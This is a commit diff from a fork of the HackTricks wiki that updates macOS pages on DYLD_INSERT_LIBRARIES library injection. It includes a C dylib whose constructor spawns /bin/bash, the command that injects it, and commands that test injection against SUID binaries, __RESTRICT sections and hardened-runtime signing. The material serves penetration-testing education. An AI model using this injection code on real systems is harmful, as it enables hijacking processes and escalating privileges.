coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GITBOOK-3926: change request with no subject merged in GitBook

Browse Source
This commit is contained in:
CPol 2023-05-15 10:48:42 +00:00 committed by gitbook-bot
parent 2b401d3335
commit 3484d7008e
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 49 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
macos-hardening/macos-security-and-privilege-escalation/README.md
View File

@ -1132,11 +1132,12 @@ In the function **`processRestricted`** the reason of the restriction is set. Ch
* Existence of `__RESTRICT/__restrict` section in the macho binary.
* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement or [`com.apple.security.cs.disable-library-validation`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
* If the lib is signed with the same certificate as the binary
* This will bypass the previous restrictions
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS:.
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS.
{% endhint %}
Find a example on how to (ab)use this in:
Find a example on how to (ab)use this and check the restrictions in:
{% content-ref url="dyld_insert_libraries.md" %}
[dyld\_insert\_libraries.md](dyld\_insert\_libraries.md)

53
macos-hardening/macos-security-and-privilege-escalation/dyld_insert_libraries.md
View File

@ -12,22 +12,22 @@
</details>
### Basic example
## Basic example
**Library to inject** to execute a shell:
```c
// gcc -dynamiclib example.c -o example.dylib
// gcc -dynamiclib -o inject.dylib inject.c
#include <stdio.h>
#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
__attribute__((constructor))
int myconstructor(int argc, const char **argv)
{
printf("[+] dylib injected in %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
}
```
@ -48,17 +48,56 @@ int main()
Injection:
```bash
DYLD_INSERT_LIBRARIES=example.dylib ./hello
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
```
### Bigger Scale
## Bigger Scale
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` executeion).
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "dylib injected"'
```
## Check restrictions
### SUID & SGID
```bash
# Make it owned by root and suid
sudo chown root hello
sudo chmod +s hello
# Insert the library
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
# Remove suid
sudo chmod -s hello
```
### Section `__RESTRICT` with segment `__restrict`
```bash
gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict
DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
```
### Hardened runtime
Create a new certificate in the Keychain and use it to sign the binary:
{% code overflow="wrap" %}
```bash
codesign -s <cert-name> --option=runtime ./hello
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
codesign -f -s <cert-name> --option=library ./hello
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Will throw an error because signature of binary and library aren't signed by same cert
codesign -s <cert-name> inject.dylib
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Throw an error because an Apple dev certificate is needed
```
{% endcode %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>